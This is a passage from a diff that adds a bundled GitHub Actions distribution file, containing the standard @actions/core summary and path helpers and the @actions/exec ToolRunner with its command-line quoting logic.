(function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.toPlatformPath = exports.toWin32Path = exports.toPosixPath = void 0; +const path = __importStar(__nccwpck_require__(1017)); +/** + * toPosixPath converts the given path to the posix form. On Windows, \\ will be + * replaced with /. + * + * @param pth. Path to transform. + * @return string Posix path. + */ +function toPosixPath(pth) { + return pth.replace(/[\\]/g, '/'); +} +exports.toPosixPath = toPosixPath; +/** + * toWin32Path converts the given path to the win32 form. On Linux, / will be + * replaced with \\. + * + * @param pth. Path to transform. + * @return string Win32 path. + */ +function toWin32Path(pth) { + return pth.replace(/[/]/g, '\\'); +} +exports.toWin32Path = toWin32Path; +/** + * toPlatformPath converts the given path to a platform-specific path. It does + * this by replacing instances of / and \ with the platform-specific path + * separator. + * + * @param pth The path to platformize. + * @return string The platform-specific path. + */ +function toPlatformPath(pth) { + return pth.replace(/[/\\]/g, path.sep); +} +exports.toPlatformPath = toPlatformPath; +//# sourceMappingURL=path-utils.js.map + +/***/ }), + +/***/ 1327: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? 
value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.summary = exports.markdownSummary = exports.SUMMARY_DOCS_URL = exports.SUMMARY_ENV_VAR = void 0; +const os_1 = __nccwpck_require__(2037); +const fs_1 = __nccwpck_require__(7147); +const { access, appendFile, writeFile } = fs_1.promises; +exports.SUMMARY_ENV_VAR = 'GITHUB_STEP_SUMMARY'; +exports.SUMMARY_DOCS_URL = 'https://docs.github.com/actions/using-workflows/workflow-commands-for-github-actions#adding-a-job-summary'; +class Summary { + constructor() { + this._buffer = ''; + } + /** + * Finds the summary file path from the environment, rejects if env var is not found or file does not exist + * Also checks r/w permissions. + * + * @returns step summary file path + */ + filePath() { + return __awaiter(this, void 0, void 0, function* () { + if (this._filePath) { + return this._filePath; + } + const pathFromEnv = process.env[exports.SUMMARY_ENV_VAR]; + if (!pathFromEnv) { + throw new Error(`Unable to find environment variable for $${exports.SUMMARY_ENV_VAR}. Check if your runtime environment supports job summaries.`); + } + try { + yield access(pathFromEnv, fs_1.constants.R_OK | fs_1.constants.W_OK); + } + catch (_a) { + throw new Error(`Unable to access summary file: '${pathFromEnv}'. 
Check if the file has correct read/write permissions.`); + } + this._filePath = pathFromEnv; + return this._filePath; + }); + } + /** + * Wraps content in an HTML tag, adding any HTML attributes + * + * @param {string} tag HTML tag to wrap + * @param {string | null} content content within the tag + * @param {[attribute: string]: string} attrs key-value list of HTML attributes to add + * + * @returns {string} content wrapped in HTML element + */ + wrap(tag, content, attrs = {}) { + const htmlAttrs = Object.entries(attrs) + .map(([key, value]) => ` ${key}="${value}"`) + .join(''); + if (!content) { + return `<${tag}${htmlAttrs}>`; + } + return `<${tag}${htmlAttrs}>${content}`; + } + /** + * Writes text in the buffer to the summary buffer file and empties buffer. Will append by default. + * + * @param {SummaryWriteOptions} [options] (optional) options for write operation + * + * @returns {Promise} summary instance + */ + write(options) { + return __awaiter(this, void 0, void 0, function* () { + const overwrite = !!(options === null || options === void 0 ? void 0 : options.overwrite); + const filePath = yield this.filePath(); + const writeFunc = overwrite ? 
writeFile : appendFile; + yield writeFunc(filePath, this._buffer, { encoding: 'utf8' }); + return this.emptyBuffer(); + }); + } + /** + * Clears the summary buffer and wipes the summary file + * + * @returns {Summary} summary instance + */ + clear() { + return __awaiter(this, void 0, void 0, function* () { + return this.emptyBuffer().write({ overwrite: true }); + }); + } + /** + * Returns the current summary buffer as a string + * + * @returns {string} string of summary buffer + */ + stringify() { + return this._buffer; + } + /** + * If the summary buffer is empty + * + * @returns {boolen} true if the buffer is empty + */ + isEmptyBuffer() { + return this._buffer.length === 0; + } + /** + * Resets the summary buffer without writing to summary file + * + * @returns {Summary} summary instance + */ + emptyBuffer() { + this._buffer = ''; + return this; + } + /** + * Adds raw text to the summary buffer + * + * @param {string} text content to add + * @param {boolean} [addEOL=false] (optional) append an EOL to the raw text (default: false) + * + * @returns {Summary} summary instance + */ + addRaw(text, addEOL = false) { + this._buffer += text; + return addEOL ? 
this.addEOL() : this; + } + /** + * Adds the operating system-specific end-of-line marker to the buffer + * + * @returns {Summary} summary instance + */ + addEOL() { + return this.addRaw(os_1.EOL); + } + /** + * Adds an HTML codeblock to the summary buffer + * + * @param {string} code content to render within fenced code block + * @param {string} lang (optional) language to syntax highlight code + * + * @returns {Summary} summary instance + */ + addCodeBlock(code, lang) { + const attrs = Object.assign({}, (lang && { lang })); + const element = this.wrap('pre', this.wrap('code', code), attrs); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML list to the summary buffer + * + * @param {string[]} items list of items to render + * @param {boolean} [ordered=false] (optional) if the rendered list should be ordered or not (default: false) + * + * @returns {Summary} summary instance + */ + addList(items, ordered = false) { + const tag = ordered ? 'ol' : 'ul'; + const listItems = items.map(item => this.wrap('li', item)).join(''); + const element = this.wrap(tag, listItems); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML table to the summary buffer + * + * @param {SummaryTableCell[]} rows table rows + * + * @returns {Summary} summary instance + */ + addTable(rows) { + const tableBody = rows + .map(row => { + const cells = row + .map(cell => { + if (typeof cell === 'string') { + return this.wrap('td', cell); + } + const { header, data, colspan, rowspan } = cell; + const tag = header ? 
'th' : 'td'; + const attrs = Object.assign(Object.assign({}, (colspan && { colspan })), (rowspan && { rowspan })); + return this.wrap(tag, data, attrs); + }) + .join(''); + return this.wrap('tr', cells); + }) + .join(''); + const element = this.wrap('table', tableBody); + return this.addRaw(element).addEOL(); + } + /** + * Adds a collapsable HTML details element to the summary buffer + * + * @param {string} label text for the closed state + * @param {string} content collapsable content + * + * @returns {Summary} summary instance + */ + addDetails(label, content) { + const element = this.wrap('details', this.wrap('summary', label) + content); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML image tag to the summary buffer + * + * @param {string} src path to the image you to embed + * @param {string} alt text description of the image + * @param {SummaryImageOptions} options (optional) addition image attributes + * + * @returns {Summary} summary instance + */ + addImage(src, alt, options) { + const { width, height } = options || {}; + const attrs = Object.assign(Object.assign({}, (width && { width })), (height && { height })); + const element = this.wrap('img', null, Object.assign({ src, alt }, attrs)); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML section heading element + * + * @param {string} text heading text + * @param {number | string} [level=1] (optional) the heading level, default: 1 + * + * @returns {Summary} summary instance + */ + addHeading(text, level) { + const tag = `h${level}`; + const allowedTag = ['h1', 'h2', 'h3', 'h4', 'h5', 'h6'].includes(tag) + ? tag + : 'h1'; + const element = this.wrap(allowedTag, text); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML thematic break (
) to the summary buffer + * + * @returns {Summary} summary instance + */ + addSeparator() { + const element = this.wrap('hr', null); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML line break (
) to the summary buffer + * + * @returns {Summary} summary instance + */ + addBreak() { + const element = this.wrap('br', null); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML blockquote to the summary buffer + * + * @param {string} text quote text + * @param {string} cite (optional) citation url + * + * @returns {Summary} summary instance + */ + addQuote(text, cite) { + const attrs = Object.assign({}, (cite && { cite })); + const element = this.wrap('blockquote', text, attrs); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML anchor tag to the summary buffer + * + * @param {string} text link text/content + * @param {string} href hyperlink + * + * @returns {Summary} summary instance + */ + addLink(text, href) { + const element = this.wrap('a', text, { href }); + return this.addRaw(element).addEOL(); + } +} +const _summary = new Summary(); +/** + * @deprecated use `core.summary` + */ +exports.markdownSummary = _summary; +exports.summary = _summary; +//# sourceMappingURL=summary.js.map + +/***/ }), + +/***/ 5278: +/***/ ((__unused_webpack_module, exports) => { + +"use strict"; + +// We use any as a valid input type +/* eslint-disable @typescript-eslint/no-explicit-any */ +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.toCommandProperties = exports.toCommandValue = void 0; +/** + * Sanitizes an input into a string so it can be passed into issueCommand safely + * @param input input to sanitize into a string + */ +function toCommandValue(input) { + if (input === null || input === undefined) { + return ''; + } + else if (typeof input === 'string' || input instanceof String) { + return input; + } + return JSON.stringify(input); +} +exports.toCommandValue = toCommandValue; +/** + * + * @param annotationProperties + * @returns The command properties to send with the actual annotation command + * See IssueCommandProperties: 
https://github.com/actions/runner/blob/main/src/Runner.Worker/ActionCommandManager.cs#L646 + */ +function toCommandProperties(annotationProperties) { + if (!Object.keys(annotationProperties).length) { + return {}; + } + return { + title: annotationProperties.title, + file: annotationProperties.file, + line: annotationProperties.startLine, + endLine: annotationProperties.endLine, + col: annotationProperties.startColumn, + endColumn: annotationProperties.endColumn + }; +} +exports.toCommandProperties = toCommandProperties; +//# sourceMappingURL=utils.js.map + +/***/ }), + +/***/ 1514: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? 
value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.getExecOutput = exports.exec = void 0; +const string_decoder_1 = __nccwpck_require__(1576); +const tr = __importStar(__nccwpck_require__(8159)); +/** + * Exec a command. + * Output will be streamed to the live console. + * Returns promise with return code + * + * @param commandLine command to execute (can include additional args). Must be correctly escaped. + * @param args optional arguments for tool. Escaping is handled by the lib. + * @param options optional exec options. See ExecOptions + * @returns Promise exit code + */ +function exec(commandLine, args, options) { + return __awaiter(this, void 0, void 0, function* () { + const commandArgs = tr.argStringToArray(commandLine); + if (commandArgs.length === 0) { + throw new Error(`Parameter 'commandLine' cannot be null or empty.`); + } + // Path to tool to execute should be first arg + const toolPath = commandArgs[0]; + args = commandArgs.slice(1).concat(args || []); + const runner = new tr.ToolRunner(toolPath, args, options); + return runner.exec(); + }); +} +exports.exec = exec; +/** + * Exec a command and get the output. + * Output will be streamed to the live console. + * Returns promise with the exit code and collected stdout and stderr + * + * @param commandLine command to execute (can include additional args). Must be correctly escaped. + * @param args optional arguments for tool. Escaping is handled by the lib. 
+ * @param options optional exec options. See ExecOptions + * @returns Promise exit code, stdout, and stderr + */ +function getExecOutput(commandLine, args, options) { + var _a, _b; + return __awaiter(this, void 0, void 0, function* () { + let stdout = ''; + let stderr = ''; + //Using string decoder covers the case where a mult-byte character is split + const stdoutDecoder = new string_decoder_1.StringDecoder('utf8'); + const stderrDecoder = new string_decoder_1.StringDecoder('utf8'); + const originalStdoutListener = (_a = options === null || options === void 0 ? void 0 : options.listeners) === null || _a === void 0 ? void 0 : _a.stdout; + const originalStdErrListener = (_b = options === null || options === void 0 ? void 0 : options.listeners) === null || _b === void 0 ? void 0 : _b.stderr; + const stdErrListener = (data) => { + stderr += stderrDecoder.write(data); + if (originalStdErrListener) { + originalStdErrListener(data); + } + }; + const stdOutListener = (data) => { + stdout += stdoutDecoder.write(data); + if (originalStdoutListener) { + originalStdoutListener(data); + } + }; + const listeners = Object.assign(Object.assign({}, options === null || options === void 0 ? void 0 : options.listeners), { stdout: stdOutListener, stderr: stdErrListener }); + const exitCode = yield exec(commandLine, args, Object.assign(Object.assign({}, options), { listeners })); + //flush any remaining characters + stdout += stdoutDecoder.end(); + stderr += stderrDecoder.end(); + return { + exitCode, + stdout, + stderr + }; + }); +} +exports.getExecOutput = getExecOutput; +//# sourceMappingURL=exec.js.map + +/***/ }), + +/***/ 8159: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? 
(function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? 
resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.argStringToArray = exports.ToolRunner = void 0; +const os = __importStar(__nccwpck_require__(2037)); +const events = __importStar(__nccwpck_require__(2361)); +const child = __importStar(__nccwpck_require__(2081)); +const path = __importStar(__nccwpck_require__(1017)); +const io = __importStar(__nccwpck_require__(7436)); +const ioUtil = __importStar(__nccwpck_require__(1962)); +const timers_1 = __nccwpck_require__(9512); +/* eslint-disable @typescript-eslint/unbound-method */ +const IS_WINDOWS = process.platform === 'win32'; +/* + * Class for running command line tools. Handles quoting and arg parsing in a platform agnostic way. + */ +class ToolRunner extends events.EventEmitter { + constructor(toolPath, args, options) { + super(); + if (!toolPath) { + throw new Error("Parameter 'toolPath' cannot be null or empty."); + } + this.toolPath = toolPath; + this.args = args || []; + this.options = options || {}; + } + _debug(message) { + if (this.options.listeners && this.options.listeners.debug) { + this.options.listeners.debug(message); + } + } + _getCommandString(options, noPrefix) { + const toolPath = this._getSpawnFileName(); + const args = this._getSpawnArgs(options); + let cmd = noPrefix ? 
'' : '[command]'; // omit prefix when piped to a second tool + if (IS_WINDOWS) { + // Windows + cmd file + if (this._isCmdFile()) { + cmd += toolPath; + for (const a of args) { + cmd += ` ${a}`; + } + } + // Windows + verbatim + else if (options.windowsVerbatimArguments) { + cmd += `"${toolPath}"`; + for (const a of args) { + cmd += ` ${a}`; + } + } + // Windows (regular) + else { + cmd += this._windowsQuoteCmdArg(toolPath); + for (const a of args) { + cmd += ` ${this._windowsQuoteCmdArg(a)}`; + } + } + } + else { + // OSX/Linux - this can likely be improved with some form of quoting. + // creating processes on Unix is fundamentally different than Windows. + // on Unix, execvp() takes an arg array. + cmd += toolPath; + for (const a of args) { + cmd += ` ${a}`; + } + } + return cmd; + } + _processLineBuffer(data, strBuffer, onLine) { + try { + let s = strBuffer + data.toString(); + let n = s.indexOf(os.EOL); + while (n > -1) { + const line = s.substring(0, n); + onLine(line); + // the rest of the string ... + s = s.substring(n + os.EOL.length); + n = s.indexOf(os.EOL); + } + return s; + } + catch (err) { + // streaming lines to console is best effort. Don't fail a build. + this._debug(`error processing line. Failed with error ${err}`); + return ''; + } + } + _getSpawnFileName() { + if (IS_WINDOWS) { + if (this._isCmdFile()) { + return process.env['COMSPEC'] || 'cmd.exe'; + } + } + return this.toolPath; + } + _getSpawnArgs(options) { + if (IS_WINDOWS) { + if (this._isCmdFile()) { + let argline = `/D /S /C "${this._windowsQuoteCmdArg(this.toolPath)}`; + for (const a of this.args) { + argline += ' '; + argline += options.windowsVerbatimArguments + ? 
a + : this._windowsQuoteCmdArg(a); + } + argline += '"'; + return [argline]; + } + } + return this.args; + } + _endsWith(str, end) { + return str.endsWith(end); + } + _isCmdFile() { + const upperToolPath = this.toolPath.toUpperCase(); + return (this._endsWith(upperToolPath, '.CMD') || + this._endsWith(upperToolPath, '.BAT')); + } + _windowsQuoteCmdArg(arg) { + // for .exe, apply the normal quoting rules that libuv applies + if (!this._isCmdFile()) { + return this._uvQuoteCmdArg(arg); + } + // otherwise apply quoting rules specific to the cmd.exe command line parser. + // the libuv rules are generic and are not designed specifically for cmd.exe + // command line parser. + // + // for a detailed description of the cmd.exe command line parser, refer to + // http://stackoverflow.com/questions/4094699/how-does-the-windows-command-interpreter-cmd-exe-parse-scripts/7970912#7970912 + // need quotes for empty arg + if (!arg) { + return '""'; + } + // determine whether the arg needs to be quoted + const cmdSpecialChars = [ + ' ', + '\t', + '&', + '(', + ')', + '[', + ']', + '{', + '}', + '^', + '=', + ';', + '!', + "'", + '+', + ',', + '`', + '~', + '|', + '<', + '>', + '"' + ]; + let needsQuotes = false; + for (const char of arg) { + if (cmdSpecialChars.some(x => x === char)) { + needsQuotes = true; + break; + } + } + // short-circuit if quotes not needed + if (!needsQuotes) { + return arg; + } + // the following quoting rules are very similar to the rules that by libuv applies. + // + // 1) wrap the string in quotes + // + // 2) double-up quotes - i.e. " => "" + // + // this is different from the libuv quoting rules. libuv replaces " with \", which unfortunately + // doesn't work well with a cmd.exe command line. + // + // note, replacing " with "" also works well if the arg is passed to a downstream .NET console app. 
+ // for example, the command line: + // foo.exe "myarg:""my val""" + // is parsed by a .NET console app into an arg array: + // [ "myarg:\"my val\"" ] + // which is the same end result when applying libuv quoting rules. although the actual + // command line from libuv quoting rules would look like: + // foo.exe "myarg:\"my val\"" + // + // 3) double-up slashes that precede a quote, + // e.g. hello \world => "hello \world" + // hello\"world => "hello\\""world" + // hello\\"world => "hello\\\\""world" + // hello world\ => "hello world\\" + // + // technically this is not required for a cmd.exe command line, or the batch argument parser. + // the reasons for including this as a .cmd quoting rule are: + // + // a) this is optimized for the scenario where the argument is passed from the .cmd file to an + // external program. many programs (e.g. .NET console apps) rely on the slash-doubling rule. + // + // b) it's what we've been doing previously (by deferring to node default behavior) and we + // haven't heard any complaints about that aspect. + // + // note, a weakness of the quoting rules chosen here, is that % is not escaped. in fact, % cannot be + // escaped when used on the command line directly - even though within a .cmd file % can be escaped + // by using %%. + // + // the saving grace is, on the command line, %var% is left as-is if var is not defined. this contrasts + // the line parsing rules within a .cmd file, where if var is not defined it is replaced with nothing. + // + // one option that was explored was replacing % with ^% - i.e. %var% => ^%var^%. this hack would + // often work, since it is unlikely that var^ would exist, and the ^ character is removed when the + // variable is used. the problem, however, is that ^ is not removed when %* is used to pass the args + // to an external program. + // + // an unexplored potential solution for the % escaping problem, is to create a wrapper .cmd file. + // % can be escaped within a .cmd file. 
+ let reverse = '"'; + let quoteHit = true; + for (let i = arg.length; i > 0; i--) { + // walk the string in reverse + reverse += arg[i - 1]; + if (quoteHit && arg[i - 1] === '\\') { + reverse += '\\'; // double the slash + } + else if (arg[i - 1] === '"') { + quoteHit = true; + reverse += '"'; // double the quote + } + else { + quoteHit = false; + } + } + reverse += '"'; + return reverse + .split('') + .reverse() + .join(''); + } + _uvQuoteCmdArg(arg) { + // Tool runner wraps child_process.spawn() and needs to apply the same quoting as + // Node in certain cases where the undocumented spawn option windowsVerbatimArguments + // is used. + // + // Since this function is a port of quote_cmd_arg from Node 4.x (technically, lib UV, + // see https://github.com/nodejs/node/blob/v4.x/deps/uv/src/win/process.c for details), + // pasting copyright notice from Node within this function: + // + // Copyright Joyent, Inc. and other Node contributors. All rights reserved. + // + // Permission is hereby granted, free of charge, to any person obtaining a copy + // of this software and associated documentation files (the "Software"), to + // deal in the Software without restriction, including without limitation the + // rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + // sell copies of the Software, and to permit persons to whom the Software is + // furnished to do so, subject to the following conditions: + // + // The above copyright notice and this permission notice shall be included in + // all copies or substantial portions of the Software. + // + // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE + // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + // FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + // IN THE SOFTWARE. + if (!arg) { + // Need double quotation for empty argument + return '""'; + } + if (!arg.includes(' ') && !arg.includes('\t') && !arg.includes('"')) { + // No quotation needed + return arg; + } + if (!arg.includes('"') && !arg.includes('\\')) { + // No embedded double quotes or backslashes, so I can just wrap + // quote marks around the whole thing. + return `"${arg}"`; + } + // Expected input/output: + // input : hello"world + // output: "hello\"world" + // input : hello""world + // output: "hello\"\"world" + // input : hello\world + // output: hello\world + // input : hello\\world + // output: hello\\world + // input : hello\"world + // output: "hello\\\"world" + // input : hello\\"world + // output: "hello\\\\\"world" + // input : hello world\ + // output: "hello world\\" - note the comment in libuv actually reads "hello world\" + // but it appears the comment is wrong, it should be "hello world\\" + let reverse = '"'; + let quoteHit = true; + for (let i = arg.length; i > 0; i--) { + // walk the string in reverse + reverse += arg[i - 1]; + if (quoteHit && arg[i - 1] === '\\') { + reverse += '\\'; + } + else if (arg[i - 1] === '"') { + quoteHit = true; + reverse += '\\'; + } + else { + quoteHit = false; + } + } + reverse += '"'; + return reverse + .split('') + .reverse() + .join(''); + } + _cloneExecOptions(options) { + options = options || {}; + const result = { + cwd: options.cwd || process.cwd(), + env: options.env || process.env, + silent: options.silent || false, + windowsVerbatimArguments: options.windowsVerbatimArguments || false, + failOnStdErr: options.failOnStdErr || false, + ignoreReturnCode: options.ignoreReturnCode || false, + delay: options.delay || 10000 + }; + 
result.outStream = options.outStream || process.stdout; + result.errStream = options.errStream || process.stderr; + return result; + } + _getSpawnOptions(options, toolPath) { + options = options || {}; + const result = {}; + result.cwd = options.cwd; + result.env = options.env; + result['windowsVerbatimArguments'] = + options.windowsVerbatimArguments || this._isCmdFile(); + if (options.windowsVerbatimArguments) { + result.argv0 = `"${toolPath}"`; + } + return result; + } + /** + * Exec a tool. + * Output will be streamed to the live console. + * Returns promise with return code + * + * @param tool path to tool to exec + * @param options optional exec options. See ExecOptions + * @returns number + */ + exec() { + return __awaiter(this, void 0, void 0, function* () { + // root the tool path if it is unrooted and contains relative pathing + if (!ioUtil.isRooted(this.toolPath) && + (this.toolPath.includes('/') || + (IS_WINDOWS && this.toolPath.includes('\\')))) { + // prefer options.cwd if it is specified, however options.cwd may also need to be rooted + this.toolPath = path.resolve(process.cwd(), this.options.cwd || process.cwd(), this.toolPath); + } + // if the tool is only a file name, then resolve it from the PATH + // otherwise verify it exists (add extension on Windows if necessary) + this.toolPath = yield io.which(this.toolPath, true); + return new Promise((resolve, reject) => __awaiter(this, void 0, void 0, function* () { + this._debug(`exec tool: ${this.toolPath}`); + this._debug('arguments:'); + for (const arg of this.args) { + this._debug(` ${arg}`); + } + const optionsNonNull = this._cloneExecOptions(this.options); + if (!optionsNonNull.silent && optionsNonNull.outStream) { + optionsNonNull.outStream.write(this._getCommandString(optionsNonNull) + os.EOL); + } + const state = new ExecState(optionsNonNull, this.toolPath); + state.on('debug', (message) => { + this._debug(message); + }); + if (this.options.cwd && !(yield ioUtil.exists(this.options.cwd))) { + 
return reject(new Error(`The cwd: ${this.options.cwd} does not exist!`)); + } + const fileName = this._getSpawnFileName(); + const cp = child.spawn(fileName, this._getSpawnArgs(optionsNonNull), this._getSpawnOptions(this.options, fileName)); + let stdbuffer = ''; + if (cp.stdout) { + cp.stdout.on('data', (data) => { + if (this.options.listeners && this.options.listeners.stdout) { + this.options.listeners.stdout(data); + } + if (!optionsNonNull.silent && optionsNonNull.outStream) { + optionsNonNull.outStream.write(data); + } + stdbuffer = this._processLineBuffer(data, stdbuffer, (line) => { + if (this.options.listeners && this.options.listeners.stdline) { + this.options.listeners.stdline(line); + } + }); + }); + } + let errbuffer = ''; + if (cp.stderr) { + cp.stderr.on('data', (data) => { + state.processStderr = true; + if (this.options.listeners && this.options.listeners.stderr) { + this.options.listeners.stderr(data); + } + if (!optionsNonNull.silent && + optionsNonNull.errStream && + optionsNonNull.outStream) { + const s = optionsNonNull.failOnStdErr + ? 
optionsNonNull.errStream + : optionsNonNull.outStream; + s.write(data); + } + errbuffer = this._processLineBuffer(data, errbuffer, (line) => { + if (this.options.listeners && this.options.listeners.errline) { + this.options.listeners.errline(line); + } + }); + }); + } + cp.on('error', (err) => { + state.processError = err.message; + state.processExited = true; + state.processClosed = true; + state.CheckComplete(); + }); + cp.on('exit', (code) => { + state.processExitCode = code; + state.processExited = true; + this._debug(`Exit code ${code} received from tool '${this.toolPath}'`); + state.CheckComplete(); + }); + cp.on('close', (code) => { + state.processExitCode = code; + state.processExited = true; + state.processClosed = true; + this._debug(`STDIO streams have closed for tool '${this.toolPath}'`); + state.CheckComplete(); + }); + state.on('done', (error, exitCode) => { + if (stdbuffer.length > 0) { + this.emit('stdline', stdbuffer); + } + if (errbuffer.length > 0) { + this.emit('errline', errbuffer); + } + cp.removeAllListeners(); + if (error) { + reject(error); + } + else { + resolve(exitCode); + } + }); + if (this.options.input) { + if (!cp.stdin) { + throw new Error('child process missing stdin'); + } + cp.stdin.end(this.options.input); + } + })); + }); + } +} +exports.ToolRunner = ToolRunner; +/** + * Convert an arg string to an array of args. Handles escaping + * + * @param argString string of arguments + * @returns string[] array of arguments + */ +function argStringToArray(argString) { + const args = []; + let inQuotes = false; + let escaped = false; + let arg = ''; + function append(c) { + // we only escape double quotes. 
+ if (escaped && c !== '"') { + arg += '\\'; + } + arg += c; + escaped = false; + } + for (let i = 0; i < argString.length; i++) { + const c = argString.charAt(i); + if (c === '"') { + if (!escaped) { + inQuotes = !inQuotes; + } + else { + append(c); + } + continue; + } + if (c === '\\' && escaped) { + append(c); + continue; + } + if (c === '\\' && inQuotes) { + escaped = true; + continue; + } + if (c === ' ' && !inQuotes) { + if (arg.length > 0) { + args.push(arg); + arg = ''; + } + continue; + } + append(c); + } + if (arg.length > 0) { + args.push(arg.trim()); + } + return args; +} +exports.argStringToArray = argStringToArray; +class ExecState extends events.EventEmitter { + constructor(options, toolPath) { + super(); + this.processClosed = false; // tracks whether the process has exited and stdio is closed + this.processError = ''; + this.processExitCode = 0; + this.processExited = false; // tracks whether the process has exited + this.processStderr = false; // tracks whether stderr was written to + this.delay = 10000; // 10 seconds + this.done = false; + this.timeout = null; + if (!toolPath) { + throw new Error('toolPath must not be empty'); + } + this.options = options; + this.toolPath = toolPath; + if (options.delay) { + this.delay = options.delay; + } + } + CheckComplete() { + if (this.done) { + return; + } + if (this.processClosed) { + this._setResult(); + } + else if (this.processExited) { + this.timeout = timers_1.setTimeout(ExecState.HandleTimeout, this.delay, this); + } + } + _debug(message) { + this.emit('debug', message); + } + _setResult() { + // determine whether there is an error + let error; + if (this.processExited) { + if (this.processError) { + error = new Error(`There was an error when attempting to execute the process '${this.toolPath}'. This may indicate the process failed to start. 
Error: ${this.processError}`); + } + else if (this.processExitCode !== 0 && !this.options.ignoreReturnCode) { + error = new Error(`The process '${this.toolPath}' failed with exit code ${this.processExitCode}`); + } + else if (this.processStderr && this.options.failOnStdErr) { + error = new Error(`The process '${this.toolPath}' failed because one or more lines were written to the STDERR stream`); + } + } + // clear the timeout + if (this.timeout) { + clearTimeout(this.timeout); + this.timeout = null; + } + this.done = true; + this.emit('done', error, this.processExitCode); + } + static HandleTimeout(state) { + if (state.done) { + return; + } + if (!state.processClosed && state.processExited) { + const message = `The STDIO streams did not close within ${state.delay / + 1000} seconds of the exit event from process '${state.toolPath}'. This may indicate a child process inherited the STDIO streams and has not yet exited.`; + state._debug(message); + } + state._setResult(); + } +} +//# sourceMappingURL=toolrunner.js.map + +/***/ }), + +/***/ 5526: +/***/ (function(__unused_webpack_module, exports) { + +"use strict"; + +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch 